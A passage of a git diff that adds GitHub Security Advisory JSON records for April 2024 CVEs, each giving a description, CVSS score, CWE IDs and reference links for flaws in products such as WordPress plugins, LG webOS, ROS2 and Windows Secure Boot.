"CWE-89" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-06T04:15:12Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-wjmr-v62x-4f45/GHSA-wjmr-v62x-4f45.json b/advisories/unreviewed/2024/04/GHSA-wjmr-v62x-4f45/GHSA-wjmr-v62x-4f45.json new file mode 100644 index 00000000000..96699b7a9aa --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-wjmr-v62x-4f45/GHSA-wjmr-v62x-4f45.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-wjmr-v62x-4f45", + "modified": "2024-04-09T21:31:59Z", + "published": "2024-04-09T21:31:59Z", + "aliases": [ + "CVE-2024-1904" + ], + "details": "The MasterStudy LMS plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the search_posts function in all versions up to, and including, 3.2.13. This makes it possible for authenticated attackers, with subscriber-level access and above, to expose draft post titles and excerpts.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1904" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset/3050967/masterstudy-lms-learning-management-system" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/1be686d3-16b1-4ec7-b304-848ca4d7162c?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T19:15:20Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-wm52-4cc3-xxgg/GHSA-wm52-4cc3-xxgg.json b/advisories/unreviewed/2024/04/GHSA-wm52-4cc3-xxgg/GHSA-wm52-4cc3-xxgg.json new file mode 100644 index 00000000000..671af166665 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-wm52-4cc3-xxgg/GHSA-wm52-4cc3-xxgg.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-wm52-4cc3-xxgg", + "modified": "2024-04-09T15:30:36Z", + "published": "2024-04-09T15:30:36Z", + "aliases": [ + "CVE-2023-6320" + ], + "details": "A command injection vulnerability exists in the com.webos.service.connectionmanager/tv/setVlanStaticAddress endpoint on webOS versions 5 and 6. A series of specially crafted requests can lead to command execution as the dbus user. An attacker can make authenticated requests to trigger this vulnerability.\n\nFull versions and TV models affected:\n * webOS 5.5.0 - 04.50.51 running on OLED55CXPUA \n\n * webOS 6.3.3-442 (kisscurl-kinglake) - 03.36.50 running on OLED48C1PUB\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-6320" + }, + { + "type": "WEB", + "url": "https://bitdefender.com/blog/labs/vulnerabilities-identified-in-lg-webos" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-78" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T14:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-wmx4-3g32-fg7m/GHSA-wmx4-3g32-fg7m.json b/advisories/unreviewed/2024/04/GHSA-wmx4-3g32-fg7m/GHSA-wmx4-3g32-fg7m.json new file mode 100644 index 00000000000..e483fcfa32e --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-wmx4-3g32-fg7m/GHSA-wmx4-3g32-fg7m.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-wmx4-3g32-fg7m", + "modified": "2024-04-09T18:30:24Z", + "published": "2024-04-09T18:30:24Z", + "aliases": [ + "CVE-2024-20688" + ], + "details": "Secure Boot Security Feature Bypass Vulnerability", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:A/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-20688" + }, + { + "type": "WEB", + "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-20688" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-121" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T17:15:33Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-wp5p-62cp-gpq5/GHSA-wp5p-62cp-gpq5.json b/advisories/unreviewed/2024/04/GHSA-wp5p-62cp-gpq5/GHSA-wp5p-62cp-gpq5.json new file mode 100644 index 00000000000..ba166cde4a5 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-wp5p-62cp-gpq5/GHSA-wp5p-62cp-gpq5.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-wp5p-62cp-gpq5", + "modified": "2024-04-09T21:31:56Z", + "published": "2024-04-09T21:31:56Z", + "aliases": [ + "CVE-2023-7046" + ], + "details": "The WP Encryption – One Click Free SSL Certificate & SSL / HTTPS Redirect to Force HTTPS, SSL Score plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 7.0 via exposed Private key files. This makes it possible for unauthenticated attackers to extract sensitive data including TLS Certificate Private Keys", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-7046" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3066915%40wp-letsencrypt-ssl&new=3066915%40wp-letsencrypt-ssl&sfp_email=&sfph_mail=" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/7ab99751-24b7-41db-8a27-d86eda3eeee5?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T19:15:13Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-wpf2-cf85-jvfv/GHSA-wpf2-cf85-jvfv.json b/advisories/unreviewed/2024/04/GHSA-wpf2-cf85-jvfv/GHSA-wpf2-cf85-jvfv.json new file mode 100644 index 00000000000..2a3f6782eca --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-wpf2-cf85-jvfv/GHSA-wpf2-cf85-jvfv.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-wpf2-cf85-jvfv", + "modified": "2024-04-05T21:32:45Z", + "published": "2024-04-05T21:32:45Z", + "aliases": [ + "CVE-2024-27912" + ], + "details": "A denial of service vulnerability was reported in some Lenovo Printers that could allow an attacker to cause the device to crash by sending crafted LPD packets.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-27912" + }, + { + "type": "WEB", + "url": "https://iknow.lenovo.com.cn/detail/420425" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-20" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-05T21:15:09Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-wprh-m7mq-qhfq/GHSA-wprh-m7mq-qhfq.json b/advisories/unreviewed/2024/04/GHSA-wprh-m7mq-qhfq/GHSA-wprh-m7mq-qhfq.json new file mode 100644 index 00000000000..d25afb2f839 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-wprh-m7mq-qhfq/GHSA-wprh-m7mq-qhfq.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-wprh-m7mq-qhfq", + "modified": "2024-04-09T18:30:24Z", + "published": "2024-04-09T18:30:24Z", + "aliases": [ + "CVE-2024-20669" + ], + "details": "Secure Boot Security Feature Bypass Vulnerability", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-20669" + }, + { + "type": "WEB", + "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-20669" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-693" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T17:15:32Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-wpv3-6qr5-9rmx/GHSA-wpv3-6qr5-9rmx.json b/advisories/unreviewed/2024/04/GHSA-wpv3-6qr5-9rmx/GHSA-wpv3-6qr5-9rmx.json new file mode 100644 index 00000000000..ad356092c1d --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-wpv3-6qr5-9rmx/GHSA-wpv3-6qr5-9rmx.json @@ -0,0 +1,39 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-wpv3-6qr5-9rmx", + "modified": "2024-04-08T12:30:31Z", + "published": "2024-04-06T12:30:56Z", + "aliases": [ + "CVE-2024-24746" + ], + "details": "Loop with Unreachable Exit Condition ('Infinite Loop') vulnerability in Apache NimBLE. \n\nSpecially crafted GATT operation can cause infinite loop in GATT server leading to denial of service in Bluetooth stack or device.\n\nThis issue affects Apache NimBLE: through 1.6.0.\nUsers are recommended to upgrade to version 1.7.0, which fixes the issue.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24746" + }, + { + "type": "WEB", + "url": "https://github.com/apache/mynewt-nimble/commit/d42a0ebe6632bd0c318560e4293a522634f60594" + }, + { + "type": "WEB", + "url": "https://lists.apache.org/thread/bptkzc0o2ymjk8qqzqdmy39kcmh27078" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-835" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-06T12:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-wq6m-mcm5-qhcj/GHSA-wq6m-mcm5-qhcj.json b/advisories/unreviewed/2024/04/GHSA-wq6m-mcm5-qhcj/GHSA-wq6m-mcm5-qhcj.json new file mode 100644 index 00000000000..96fc709b40b --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-wq6m-mcm5-qhcj/GHSA-wq6m-mcm5-qhcj.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-wq6m-mcm5-qhcj", + "modified": "2024-04-09T18:30:26Z", + "published": "2024-04-09T18:30:26Z", + "aliases": [ + "CVE-2024-28905" + ], + "details": "Microsoft Brokering File System Elevation of Privilege Vulnerability", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-28905" + }, + { + "type": "WEB", + "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-28905" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-269" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T17:15:49Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-wqv6-gf55-v5gj/GHSA-wqv6-gf55-v5gj.json b/advisories/unreviewed/2024/04/GHSA-wqv6-gf55-v5gj/GHSA-wqv6-gf55-v5gj.json new file mode 100644 index 00000000000..895d0ace9af --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-wqv6-gf55-v5gj/GHSA-wqv6-gf55-v5gj.json @@ -0,0 +1,35 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-wqv6-gf55-v5gj", + "modified": "2024-04-10T15:30:38Z", + "published": "2024-04-10T15:30:38Z", + "aliases": [ + "CVE-2024-30712" + ], + "details": "A shell injection vulnerability was discovered in ROS2 (Robot Operating System 2) Dashing Diademata in ROS_VERSION 2 and ROS_PYTHON_VERSION 3, allows remote attackers to execute arbitrary code, escalate privileges, and obtain sensitive information due to the way ROS2 handles shell command execution in components like command interpreters or interfaces that process external inputs.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-30712" + }, + { + "type": "WEB", + "url": "https://github.com/yashpatelphd/CVE-2024-30712" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-10T02:15:10Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-wvjq-4p9q-4q7p/GHSA-wvjq-4p9q-4q7p.json b/advisories/unreviewed/2024/04/GHSA-wvjq-4p9q-4q7p/GHSA-wvjq-4p9q-4q7p.json new file mode 100644 index 00000000000..ce55dcf0667 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-wvjq-4p9q-4q7p/GHSA-wvjq-4p9q-4q7p.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-wvjq-4p9q-4q7p", + "modified": "2024-04-09T18:30:26Z", + "published": "2024-04-09T18:30:26Z", + "aliases": [ + "CVE-2024-28898" + ], + "details": "Secure Boot Security Feature Bypass Vulnerability", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:A/AC:H/PR:H/UI:R/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-28898" + }, + { + "type": "WEB", + "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-28898" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-121" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T17:15:48Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-wvqc-rrc5-mp8p/GHSA-wvqc-rrc5-mp8p.json b/advisories/unreviewed/2024/04/GHSA-wvqc-rrc5-mp8p/GHSA-wvqc-rrc5-mp8p.json new file mode 100644 index 00000000000..b66a068ae5d --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-wvqc-rrc5-mp8p/GHSA-wvqc-rrc5-mp8p.json @@ -0,0 +1,35 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-wvqc-rrc5-mp8p", + "modified": "2024-04-10T15:30:38Z", + "published": "2024-04-10T15:30:38Z", + "aliases": [ + "CVE-2024-30721" + ], + "details": "An arbitrary file upload vulnerability has been discovered in ROS2 Dashing Diademata in ROS_VERSION 2 and ROS_PYTHON_VERSION 3, allows attackers to execute arbitrary code, cause a denial of service (DoS), and obtain sensitive information via a crafted payload to the file upload mechanism of the ROS2 system, including the server’s functionality for handling file uploads and the associated validation processes.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-30721" + }, + { + "type": "WEB", + "url": "https://github.com/yashpatelphd/CVE-2024-30721" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-10T03:15:06Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-wvrc-7835-9grj/GHSA-wvrc-7835-9grj.json b/advisories/unreviewed/2024/04/GHSA-wvrc-7835-9grj/GHSA-wvrc-7835-9grj.json new file mode 100644 index 00000000000..8b4f85a437e --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-wvrc-7835-9grj/GHSA-wvrc-7835-9grj.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-wvrc-7835-9grj", + "modified": "2024-04-09T21:31:59Z", + "published": "2024-04-09T21:31:59Z", + "aliases": [ + "CVE-2024-2340" + ], + "details": "The Avada theme for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 7.11.6 via the '/wp-content/uploads/fusion-forms/' directory. This makes it possible for unauthenticated attackers to extract sensitive data uploaded via an Avada created form with a file upload mechanism.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-2340" + }, + { + "type": "WEB", + "url": "https://avada.com/documentation/avada-changelog" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/8db8bbc3-43ca-4ef5-a44d-2987c8597961?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T19:15:32Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-wvxc-855f-jvrv/GHSA-wvxc-855f-jvrv.json b/advisories/unreviewed/2024/04/GHSA-wvxc-855f-jvrv/GHSA-wvxc-855f-jvrv.json new file mode 100644 index 00000000000..daad4c9a148 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-wvxc-855f-jvrv/GHSA-wvxc-855f-jvrv.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-wvxc-855f-jvrv", + "modified": "2024-04-09T18:30:28Z", + "published": "2024-04-09T18:30:28Z", + "aliases": [ + "CVE-2024-29992" + ], + "details": "Azure Identity Library for .NET Information Disclosure Vulnerability", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-29992" + }, + { + "type": "WEB", + "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-29992" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-522" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T17:16:02Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-ww88-jw5q-2479/GHSA-ww88-jw5q-2479.json b/advisories/unreviewed/2024/04/GHSA-ww88-jw5q-2479/GHSA-ww88-jw5q-2479.json new file mode 100644 index 00000000000..70d89ba87bf --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-ww88-jw5q-2479/GHSA-ww88-jw5q-2479.json @@ -0,0 +1,50 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-ww88-jw5q-2479", + "modified": "2024-04-08T21:31:16Z", + "published": "2024-04-08T21:31:16Z", + "aliases": [ + "CVE-2024-3464" + ], + "details": "A vulnerability was found in SourceCodester Laundry Management System 1.0 and classified as critical. This issue affects the function laporan_filter of the file /application/controller/Pelanggan.php. The manipulation of the argument jeniskelamin leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-259745 was assigned to this vulnerability.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-3464" + }, + { + "type": "WEB", + "url": "https://github.com/fubxx/CVE/blob/main/LaundryManagementSystemSQL2.md" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.259745" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.259745" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.312304" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-89" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-08T20:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-wx98-g485-pgfr/GHSA-wx98-g485-pgfr.json b/advisories/unreviewed/2024/04/GHSA-wx98-g485-pgfr/GHSA-wx98-g485-pgfr.json new file mode 100644 index 00000000000..c685ad6a9f1 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-wx98-g485-pgfr/GHSA-wx98-g485-pgfr.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-wx98-g485-pgfr", + "modified": "2024-04-09T18:30:26Z", + "published": "2024-04-09T18:30:26Z", + "aliases": [ + "CVE-2024-28896" + ], + "details": "Secure Boot Security Feature Bypass Vulnerability", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:A/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-28896" + }, + { + "type": "WEB", + "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-28896" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-122" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T17:15:47Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-wxvv-7x57-mjgj/GHSA-wxvv-7x57-mjgj.json b/advisories/unreviewed/2024/04/GHSA-wxvv-7x57-mjgj/GHSA-wxvv-7x57-mjgj.json new file mode 100644 index 00000000000..42b12c61fd9 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-wxvv-7x57-mjgj/GHSA-wxvv-7x57-mjgj.json @@ -0,0 +1,43 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-wxvv-7x57-mjgj", + "modified": "2024-04-09T00:30:41Z", + "published": "2024-04-09T00:30:41Z", + "aliases": [ + "CVE-2024-22949" + ], + "details": "JFreeChart v1.5.4 was discovered to contain a NullPointerException via the component /chart/annotations/CategoryLineAnnotation.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-22949" + }, + { + "type": "WEB", + "url": "https://gist.github.com/LLM4IG/35c46e009b205ef6acd0e290e80fb876" + }, + { + "type": "WEB", + "url": "https://github.com/jfree/jfreechart" + }, + { + "type": "WEB", + "url": "http://jfreechart.com" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-08T23:15:07Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-x237-rgmj-6rg4/GHSA-x237-rgmj-6rg4.json b/advisories/unreviewed/2024/04/GHSA-x237-rgmj-6rg4/GHSA-x237-rgmj-6rg4.json new file mode 100644 index 00000000000..93ae35ac19f --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-x237-rgmj-6rg4/GHSA-x237-rgmj-6rg4.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-x237-rgmj-6rg4", + "modified": "2024-04-07T18:30:30Z", + "published": "2024-04-07T18:30:30Z", + "aliases": [ + "CVE-2024-31308" + ], + "details": "Deserialization of Untrusted Data vulnerability in VJInfotech WP Import Export Lite.This issue affects WP Import Export Lite: from n/a through 3.9.26.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-31308" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/vulnerability/wp-import-export-lite/wordpress-wp-import-export-lite-wp-import-export-plugin-3-9-26-php-object-injection-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-502" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-07T18:15:12Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-x246-w3fc-9p6h/GHSA-x246-w3fc-9p6h.json b/advisories/unreviewed/2024/04/GHSA-x246-w3fc-9p6h/GHSA-x246-w3fc-9p6h.json new file mode 100644 index 00000000000..fbde5877e7b --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-x246-w3fc-9p6h/GHSA-x246-w3fc-9p6h.json @@ -0,0 +1,39 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-x246-w3fc-9p6h", + "modified": "2024-04-07T09:30:28Z", + "published": "2024-04-07T09:30:28Z", + "aliases": [ + "CVE-2024-30415" + ], + "details": "Vulnerability of improper permission control in the window management module.\nImpact: Successful exploitation of this vulnerability will affect availability.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-30415" + }, + { + "type": "WEB", + "url": "https://consumer.huawei.com/en/support/bulletin/2024/4" + }, + { + "type": "WEB", + "url": "https://device.harmonyos.com/en/docs/security/update/security-bulletins-202404-0000001880501689" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-07T08:15:07Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-x2m4-5rqp-rhvq/GHSA-x2m4-5rqp-rhvq.json b/advisories/unreviewed/2024/04/GHSA-x2m4-5rqp-rhvq/GHSA-x2m4-5rqp-rhvq.json new file mode 100644 index 00000000000..2c2985a6488 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-x2m4-5rqp-rhvq/GHSA-x2m4-5rqp-rhvq.json @@ -0,0 +1,35 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-x2m4-5rqp-rhvq", + "modified": "2024-04-08T21:31:16Z", + "published": "2024-04-08T21:31:16Z", + "aliases": [ + "CVE-2024-27630" + ], + "details": "Insecure Direct Object Reference (IDOR) in GNU Savane v.3.12 and before allows a remote attacker to delete arbitrary files via crafted input to the trackers_data_delete_file function.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-27630" + }, + { + "type": "WEB", + "url": "https://medium.com/%40allypetitt/how-i-found-3-cves-in-2-days-8a135eb924d3" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-08T21:15:09Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-x498-p429-582w/GHSA-x498-p429-582w.json b/advisories/unreviewed/2024/04/GHSA-x498-p429-582w/GHSA-x498-p429-582w.json new file mode 100644 index 00000000000..05c5e8a921f --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-x498-p429-582w/GHSA-x498-p429-582w.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-x498-p429-582w", + "modified": "2024-04-10T15:30:40Z", + "published": "2024-04-10T15:30:40Z", + "aliases": [ + "CVE-2024-26087" + ], + "details": "Adobe Experience Manager versions 6.5.19 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by an attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-26087" + }, + { + "type": "WEB", + "url": "https://helpx.adobe.com/security/products/experience-manager/apsb24-21.html" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-10T09:15:09Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-x57p-235m-crc8/GHSA-x57p-235m-crc8.json b/advisories/unreviewed/2024/04/GHSA-x57p-235m-crc8/GHSA-x57p-235m-crc8.json new file mode 100644 index 00000000000..a9c3a6697e5 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-x57p-235m-crc8/GHSA-x57p-235m-crc8.json @@ -0,0 +1,35 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-x57p-235m-crc8", + "modified": "2024-04-08T09:31:11Z", + "published": "2024-04-08T09:31:11Z", + "aliases": [ + "CVE-2024-30659" + ], + "details": "Shell Injection vulnerability in ROS (Robot Operating System) Melodic Morenia versions ROS_VERSION 1 and ROS_PYTHON_VERSION 3, allows attackers to execute arbitrary code, escalate privileges, and obtain sensitive information.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": 